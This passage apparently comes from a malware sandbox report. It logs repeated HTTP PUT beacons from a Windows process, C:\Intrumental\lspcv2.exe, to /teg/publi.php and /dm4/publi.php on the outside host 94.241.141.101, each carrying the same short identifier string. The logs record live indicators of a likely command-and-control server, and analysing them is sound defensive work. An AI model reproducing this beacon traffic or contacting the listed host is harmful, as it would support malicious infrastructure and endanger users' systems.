                                                                                                                  Nov 14, 2024 15:01:04.083118916 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:04.984281063 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:04 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  40192.168.2.44994694.241.141.101807912C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:04.974242926 CET199OUTPUT /teg/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:04.982136011 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:05.856271982 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:05 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  41192.168.2.44994794.241.141.101804020C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:05.196218967 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:05.201185942 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:06.060261011 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:05 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  42192.168.2.44994994.241.141.101803220C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:05.300327063 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:05.305358887 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:06.184755087 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:06 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  43192.168.2.44995494.241.141.101807912C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:05.979614973 CET199OUTPUT /teg/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:05.984591961 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:06.864527941 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:06 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  44192.168.2.44995694.241.141.101804020C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:06.186877012 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:06.200933933 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:07.084415913 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:06 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  45192.168.2.44995794.241.141.101803220C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:06.312882900 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:06.318339109 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:07.217459917 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:07 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  46192.168.2.44996394.241.141.101807912C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:06.982214928 CET199OUTPUT /teg/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:06.990006924 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:07.896181107 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:07 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  47192.168.2.44996494.241.141.101804020C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:07.225634098 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:07.232024908 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:08.124144077 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:07 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  48192.168.2.44996894.241.141.101803220C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:07.346370935 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:07.354017973 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:08.230052948 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:08 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  49192.168.2.44997194.241.141.101807912C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:08.011271000 CET199OUTPUT /teg/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:08.016823053 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:08.891042948 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:08 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  50192.168.2.44997594.241.141.101804020C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:08.249887943 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:08.254894018 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:09.141422033 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:08 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  51192.168.2.44997694.241.141.101803220C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:08.343744040 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:08.348834991 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:09.228753090 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:09 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  52192.168.2.44998094.241.141.101807912C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:09.011648893 CET199OUTPUT /teg/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:09.018008947 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:09.908354044 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:09 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  53192.168.2.44998394.241.141.101804020C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:09.266210079 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:09.271433115 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:10.168386936 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:10 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  54192.168.2.44998494.241.141.101803220C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:09.346347094 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:09.354016066 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:10.252228022 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:10 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  55192.168.2.44999094.241.141.101807912C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:10.026730061 CET199OUTPUT /teg/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:10.031563044 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:10.929128885 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:10 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  56192.168.2.44999194.241.141.101804020C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:10.297317982 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:10.302241087 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:11.185817957 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:11 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  57192.168.2.44999294.241.141.101803220C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:10.391375065 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:10.396405935 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:11.292045116 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:11 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  58192.168.2.44999794.241.141.101807912C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:11.044303894 CET199OUTPUT /teg/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:11.050005913 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:11.928544998 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:11 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  59192.168.2.44999994.241.141.101804020C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:11.312300920 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:11.317501068 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:12.201836109 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:12 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  60192.168.2.45000194.241.141.101803220C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:11.409269094 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:11.418148041 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:12.303128004 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:12 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  61192.168.2.45000494.241.141.101807912C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:12.042726994 CET199OUTPUT /teg/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:12.048324108 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:12.960232019 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:12 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  62192.168.2.45000694.241.141.101804020C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:12.330305099 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:12.336875916 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:13.223481894 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:13 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  63192.168.2.45000894.241.141.101803220C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:12.424140930 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:12.430042028 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:13.313218117 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:13 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  64192.168.2.45001294.241.141.101807912C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:13.075068951 CET199OUTPUT /teg/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:13.080121994 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:13.975619078 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:13 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  65192.168.2.45001594.241.141.101804020C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
